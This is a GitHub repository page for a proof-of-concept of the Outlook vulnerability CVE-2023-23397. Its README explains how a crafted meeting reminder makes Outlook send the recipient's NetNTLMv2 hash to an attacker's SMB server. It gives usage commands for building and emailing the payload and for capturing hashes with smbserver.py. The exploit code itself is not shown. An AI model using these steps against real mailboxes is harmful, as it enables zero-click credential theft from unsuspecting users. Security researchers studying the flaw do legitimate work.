Skip to content
/ CVE-2023-23397 Public
forked from Trackflaw/CVE-2023-23397

Simple PoC of the CVE-2023-23397 vulnerability with the payload sent by email.

0 stars 27 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

cnkizy/CVE-2023-23397

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
CVE-2023-23397.py
CVE-2023-23397.py
 
 
README.md
README.md
 
 
poc.gif
poc.gif
 
 

Repository files navigation

CVE-2023-23397

Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client.

Description

Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability).

An attacker exploiting this vulnerability retrieves a NetNTLMv2 digest based on the password of the trapped user through an SMB request. The request is triggered as soon as the mail arrives in the inbox.

What does the poc do?

  1. Generated .msg payload.
  2. Send it by email with custom SMTP server.

Usage

In one session :

python CVE-2023-23397.py

usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path

python CVE-2023-23397.py --path '\\yourip\'

In a second session (smbserver or responder as you want).

smbserver.py -smb2support SHARE .

Demo (manual poc)

poc

Original article

https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/

About

Simple PoC of the CVE-2023-23397 vulnerability with the payload sent by email.

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%